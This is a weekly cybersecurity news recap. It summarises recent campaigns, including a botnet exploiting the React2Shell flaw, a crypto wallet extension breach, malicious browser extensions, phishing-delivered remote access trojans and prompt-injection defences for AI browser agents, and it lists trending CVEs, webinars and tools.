⚡ Weekly Recap: IoT Exploits, Wallet Breaches, Rogue Extensions, AI Abuse & More

The year opened without a reset. The same pressure carried over, and in some places it tightened. Systems people assume are boring or stable are showing up in the wrong places. Attacks moved quietly, reused familiar paths, and kept working longer than anyone wants to admit.

This week's stories share one pattern. Nothing flashy. No single moment. Just steady abuse of trust — updates, extensions, logins, messages — the things people click without thinking. That's where damage starts now.

This recap pulls those signals together. Not to overwhelm, but to show where attention slipped and why it matters early in the year.

⚡ Threat of the Week

RondoDox Botnet Exploits React2Shell Flaw — A persistent nine-month-long campaign has targeted Internet of Things (IoT) devices and web applications to enroll them into a botnet known as RondoDox. As of December 2025, the activity has been observed leveraging the recently disclosed React2Shell (CVE-2025-55182, CVSS score: 10.0) flaw as an initial access vector. React2Shell is the name assigned to a critical security vulnerability in React Server Components (RSC) and Next.js that could allow unauthenticated attackers to achieve remote code execution on susceptible devices. According to statistics from the Shadowserver Foundation, there are about 84,916 instances that remain susceptible to the vulnerability as of January 4, 2026, out of which 66,200 instances are located in the U.S., followed by Germany (3,600), France (2,500), and India (1,290).

A New Framework for Identity Security in the AI Era

In 2026, the security landscape is littered with unmanaged threats, including AI tools, SaaS apps, devices, and identities. Join 1Password CPO Abe Ankumah and security analyst Francis Odum to hear how security and IT leaders are taking control – without slowing down the pace of innovation.

Join the webinar ➝

🔔 Top News

• Trust Wallet Chrome Extension Hack Traced to Shai-Hulud Supply Chain Attack — Trust Wallet revealed that the second iteration of the Shai-Hulud (aka Sha1-Hulud) supply chain outbreak in November 2025 was likely responsible for the hack of its Google Chrome extension, ultimately resulting in the theft of approximately $8.5 million in assets. "Our Developer GitHub secrets were exposed in the attack, which gave the attacker access to our browser extension source code and the Chrome Web Store (CWS) API key," the company said. "The attacker obtained full CWS API access via the leaked key, allowing builds to be uploaded directly without Trust Wallet's standard release process, which requires internal approval/manual review." The unknown threat actors are said to have registered a domain to exfiltrate users' wallet mnemonic phrases. Koi's analysis found that directly querying the server to which the data was exfiltrated returned the response "He who controls the spice controls the universe," a Dune reference that echoes similar references observed in the Shai-Hulud npm incident. There is evidence to suggest that preparations for the hack were underway since at least December 8, 2025.
• DarkSpectre Linked to Massive Browser Extension Campaigns — A newly uncovered Chinese threat group, DarkSpectre, has been linked to one of the most widespread browser-extension malware operations discovered to date, compromising more than 8.8 million users of Chrome, Edge, Firefox, and Opera over the past seven years. DarkSpectre's structure differs from that of traditional cybercrime operations. The group has been found to run disparate but interconnected malware clusters, each with distinct goals. The ShadyPanda campaign, responsible for 5.6 million infections, focuses on long-term user surveillance and e-commerce affiliate fraud. The second campaign, GhostPoster, spreads via Firefox and Opera extensions that conceal malicious payloads in PNG images via steganography. After lying dormant for several days, the extensions extract and execute JavaScript hidden within images, enabling stealthy remote code execution. This campaign has affected over one million users and relies on domains like gmzdaily.com and mitarchive.info for payload delivery. The most recent discovery, The Zoom Stealer, exposes around 2.2 million users to corporate espionage. The discovery reveals a highly organized criminal organization that has devoted itself to steadily churning out legitimate-looking browser extensions that sneak in malicious code.
• U.S. Treasury Lifts Sanctions on 3 Individuals Connected to Intellexa — The U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC) removed three individuals linked to the Intellexa Consortium, the holding company behind a commercial spyware known as Predator, from the specially designated nationals list. They included Merom Harpaz, Andrea Nicola Constantino Hermes Gambazzi, and Sara Aleksandra Fayssal Hamou. In a statement shared with Reuters, the Treasury said the removal "was done as part of the normal administrative process in response to a petition request for reconsideration." The department added that the individuals had "demonstrated measures to separate themselves from the Intellexa Consortium."
• Silver Fox Strikes India with Tax Lures — The Chinese cybercrime group known as Silver Fox has turned its focus to India, using income tax-themed lures in phishing campaigns to distribute a modular remote access trojan called ValleyRAT (aka Winos 4.0). In the campaign, phishing emails containing decoy PDFs purported to be from India's Income Tax Department are used to deploy ValleyRAT, a variant of Gh0st RAT that implements a plugin-oriented architecture to extend its functionality in an ad hoc manner, thereby allowing its operators to deploy specialized capabilities to facilitate keylogging, credential harvesting, and defense evasion. The disclosure came as a link management panel associated with Silver Fox was identified as being used to keep track of the web pages used to deliver fake installers containing ValleyRAT and the number of clicks to download the installers. An analysis of the origin IP addresses that have clicked on the download links has revealed that at least 217 clicks originated from China, followed by the U.S. (39), Hong Kong (29), Taiwan (11), and Australia (7).
• Mustang Panda Uses Rootkit Driver to Deliver TONESHELL — The Chinese hacking group known as Mustang Panda (aka HoneyMyte) leveraged a previously undocumented kernel-mode rootkit driver to deliver a new variant of backdoor dubbed TONESHELL in a cyber attack detected in mid-2025 targeting an unspecified entity in Asia. The main objective of the driver is to inject a backdoor trojan into the system processes and provide protection for malicious files, user-mode processes, and registry keys. The final payload deployed as part of the attack is TONESHELL, an implant with reverse shell and downloader capabilities to fetch next-stage malware onto compromised hosts. The use of TONESHELL has been attributed to Mustang Panda since at least late 2022. The command-and-control (C2) infrastructure used for TONESHELL is said to have been erected in September 2024, although there are indications that the campaign itself did not commence until February 2025.

‎️‍🔥 Trending CVEs

Hackers act fast. They can use new bugs within hours. One missed update can cause a big breach. Here are this week's most serious security flaws. Check them, fix what matters first, and stay protected.

This week's list includes — CVE-2025-13915 (IBM API Connect), CVE-2025-52691 (SmarterTools SmarterMail), CVE-2025-47411 (Apache StreamPipes), CVE-2025-48769 (Apache NuttX RTOS), CVE-2025-14346 (WHILL Model C2 Electric Wheelchairs and Model F Power Chairs), CVE-2025-52871, CVE-2025-53597 (QNAP), CVE-2025-59887, and CVE-2025-59888 (Eaton UPS Companion).

📰 Around the Cyber World

• 200 Security Incidents Target Crypto in 2025 — According to "incomplete statistics" from blockchain security firm SlowMist, 200 security breaches occurred last year, impacting the crypto community, resulting in losses of around $2.935 billion. "In comparison, 2024 saw 410 incidents with around $2.013 billion in losses," the company said. "While the number of incidents declined year-over-year, the total amount of losses increased by approximately 46%."
• PyPI Says 52% of Active Users Have 2FA Enabled — The Python Software Foundation said 52% of active PyPI users are now using two-factor authentication to secure their accounts, and that more than 50,000 projects are using trusted publishing. Some of the other notable security measures rolled out in the Python Package Index (PyPI) include warning users about untrusted domains, preventing attacks involving malicious ZIP files, flagging potential typosquatting attempts during project creation, periodically checking for expired domains to prevent domain resurrection attacks, and prohibiting registrations from specific domains that were a source of abuse.
• TikTok Takes Down Influence Network Targeting Hungary — TikTok said it took down a network of 95 accounts with 131,342 followers that operated from Hungary and targeted audiences in the country. "The individuals behind this network created inauthentic accounts in order to amplify narratives favorable to the Fidesz political party," the social media platform said. "The network was found to coordinate across multiple online platforms."
• Handala Team Breaches Telegram Account of Israeli Officials — The pro-Iranian group known as Handala broke into the Telegram accounts of two prominent Israeli political figures, including former Prime Minister Naftali Bennett and Tzachi Braverman, Netanyahu's Chief of Staff. "The most probable attack vectors include social engineering or spear phishing targeting passwords and OTPs, the exfiltration of Telegram Desktop session files (tdata) from compromised workstations, or unauthorized access to cloud backups," KELA said. "While the scope of the breach was likely exaggerated by Handala, the incident highlights the critical need for session management and MFA, even on 'secure' messaging apps." In late November 2025, the group also published a list of Israeli high-tech and aerospace professionals, misleadingly describing them as criminals.
• Flaws in Bluetooth Headphones Using Airoha Chips Detailed — More details have emerged about three vulnerabilities impacting Bluetooth headphones using Airoha chips: CVE-2025-20700, CVE-2025-20701, and CVE-2025-20702. The flaws impacted headphones from Sony, Marshall, JBL, and Beyerdynamic, and were patched back in June. The issues could be exploited by an attacker in physical proximity to silently connect to a pair of headphones via BLE or Classic Bluetooth, exfiltrate the flash memory of the headphones, and extract the Bluetooth Link Key. This, in turn, allows the attacker to impersonate a "Bluetooth" device, connect to a target's phone, and interact with it from the privileged position of a trusted peripheral, including even eavesdropping on conversations and extracting call history and stored contacts.
• Ransomware Turns Breaches into Bidding Wars — Ransomware's evolution from digital extortion into a "structured, profit-driven criminal enterprise" has paved the way for an ecosystem that not only attempts to ransom stolen data, but also monetizes for maximum profit by selling it to the highest bidder through data auctions. "By opening additional profit streams and attracting more participants, these actors are amplifying both the frequency and impact of ransomware operations," Rapid7 said. "The rise of data auctions reflects a maturing underground economy, one that mirrors legitimate market behavior, yet drives the continued expansion and professionalization of global ransomware activity."

• Teams Notifications Abused for Callback Phishing — Threat actors are abusing #Microsoft Teams notifications for callback phishing attacks. "Victims are invited to groups where team names contain the scam content, such as fake invoices, auto-renewal notices, or PayPal payment claims, and are urged to call a fake support number if the charge was not authorized. Because these messages come from the official Microsoft Teams sender address (no-reply@teams.mail[.]microsoft), they may bypass user suspicion and email filters," Trustwave said.
• Teams Vishing Attack Leads to .NET Malware — In another campaign spotted by the security vendor, a vishing campaign originating from Teams has been found to trick unsuspecting users into installing Quick Assist software, ultimately leading to the deployment of a multi-stage .NET malware using an executable named updater.exe. "The Victim receives a Teams call from an attacker impersonating Senior IT Staff," it said. "Attacker convinces user to launch Quick Assist. The 'updater.exe' is a .NET Core 8.0 wrapper with embedded "loader.dll" that downloads encryption keys from jysync[.]info, retrieves encrypted payload, decrypts using AES-CBC + XOR, then loads assembly directly into memory for fileless execution via reflection."
• SEO Poisoning Distributes Oyster — A search engine optimization (SEO) poisoning campaign has continued to promote fake sites when users search for Microsoft Teams or Google Meet to distribute a backdoor called Oyster. This malware distribution threat has been active since at least November 2024. In July 2025, Arctic Wolf said it observed a similar wave of attacks that leveraged bogus sites hosting trojanized versions of legitimate tools like PuTTY and WinSCP to deliver the malware. Oyster is delivered via a loader component that's responsible for dropping the main component. The main payload then gathers system information, communicates with a C2 server, and provides the ability to remotely execute code.
• Fake SAP Concur Extensions Deliver FireClient Malware — A new campaign discovered by BlueVoyant is deceiving users into downloading fake SAP Concur browser extensions. The fake browser extension installer contains a loader designed to gather host information and send it to its C2 server. The loader subsequently extracts an embedded backdoor called FireClient that contains functionality to execute remote commands using the command console and PowerShell. It's assessed that the malware is distributed via malvertising, hijacking search queries for "Concur log in" on search engines like Bing. The starting point is an MSI installer that deploys a portable version of Firefox to the directory "LOCALAPPDATA\Programs\Firefox" in a deliberate effort to evade detection and avoid conflicts with existing Firefox installations. "After installation, the MSI file launches Firefox in headless mode, meaning the browser runs without a visible window, making its execution undetectable to the user," researchers Joshua Green and Thomas Elkins said. "Once Firefox is running, the user's default browser is opened and redirected to the legitimate Concur website. This tactic is intended to create the illusion that the extension installation was successful, thereby deceiving the user." In the background, the malware proceeds to overwrite configuration files located within Firefox profile directories to induce the browser to launch the loader DLL. BlueVoyant's analysis has uncovered tactical and infrastructural overlaps with GrayAlpha (aka FIN7), which was previously observed leveraging fake browser update websites as part of its operations. "The FireClient malware likely represents a sophisticated component of GrayAlpha's evolving toolkit, deployed within a multi-pronged campaign leveraging a variety of trusted software lures," the company said.
• OpenAI Says Prompt Injections May Never Go Away in Browser Agents — OpenAI disclosed that it shipped a security update to its ChatGPT Atlas browser with a newly adversarially trained model and strengthened surrounding safeguards to better combat prompt injections, which makes it possible to conceal malicious instructions within online content and cause the artificial intelligence (AI) agent to override its guardrails. The company conceded that "agent mode" in ChatGPT Atlas broadens the security threat surface. "This update was prompted by a new class of prompt-injection attacks uncovered through our internal automated red teaming," it said. The AI company said it built an LLM-based automated attacker and trained it with reinforcement learning to look for prompt injections that can successfully attack a browser agent. "Prompt injection, much like scams and social engineering on the web, is unlikely to ever be fully 'solved,'" it added. "But we're optimistic that a proactive, highly responsive rapid response loop can continue to materially reduce real-world risk over time. By combining automated attack discovery with adversarial training and system-level safeguards, we can identify new attack patterns earlier, close gaps faster, and continuously raise the cost of exploitation." The changes are in line with similar approaches undertaken by Anthropic and Google to fight the persistent risk of prompt-based attacks. The development comes as Microsoft revealed that adversaries have begun implementing AI across a range of malicious activities, including automated vulnerability discovery or phishing campaigns, malware or deepfake generation, data analysis, influence operations, and crafting convincing fraudulent messages. "AI-automated phishing emails achieved 54% click-through rates compared to 12% for standard attempts – a 4.5x increase," it said. "AI enables more targeted phishing and better phishing lures."

🎥 Cybersecurity Webinars

• Defeating "Living off the Land": Proactive Security for 2026 - To stay ahead of evolving threats, defenders must move beyond traditional file-based detection toward proactive, AI-powered visibility. This session reveals how to catch "living off the land" and fileless attacks that use legitimate system tools to bypass legacy security. You'll learn how to secure developer workflows and encrypted traffic using Zero Trust principles, ensuring that even the most stealthy, binary-less threats are neutralized before they reach your endpoints.
• How to Scale AI Agents Without Scaling Your Attack Surface - As developers use AI agents like Claude Code and Copilot to ship code at warp speed, they are unknowingly introducing new risks through unmanaged "MCP" servers and hidden API keys. This webinar explains how to secure these autonomous tools before they become backdoors for data theft or remote attacks. Join us to learn how to identify malicious tools in your environment and enforce the security policies needed to keep your organization fast but safe.
• Scaling Your MSSP: High-Margin CISO Services Powered by AI - In 2026, staying competitive as an MSSP requires moving beyond manual labor to AI-driven security management. This session explores how leading providers are using automation to slash workloads and deliver high-value CISO services without increasing headcount. By joining industry experts David Primor and Chad Robinson, you'll learn proven strategies to package tier-based offerings, boost profit margins, and empower your existing team to deliver expert-level results at scale.

🔧 Cybersecurity Tools

• rnsec - It is a lightweight command-line security scanner for React Native and Expo apps. It runs with no configuration, analyzes the code statically, and flags common security issues such as hardcoded secrets, insecure storage, weak crypto, and unsafe network usage. Results are delivered as a simple HTML or JSON report, making it easy to review locally or plug into CI pipelines.
• Duplicati - It is a free, open-source backup tool that encrypts your data before sending it to cloud storage or remote servers. It supports incremental and compressed backups, runs on Windows, macOS, and Linux, and works with many providers like S3, Google Drive, OneDrive, and SFTP. Backups can be scheduled automatically and managed through a simple web interface or the command line.

Disclaimer: These tools are for learning and research only. They haven't been fully tested for security. If used the wrong way, they could cause harm. Check the code first, test only in safe places, and follow all rules and laws.

Conclusion

What matters is not any single incident, but what they show together. The same weaknesses keep getting tested from different angles. When something works once, it gets reused, copied, and scaled. That pattern is clear before the details even matter.

Use this recap as a check, not a warning. If these issues feel familiar, that's the point. Familiar problems are the ones most likely to be missed again.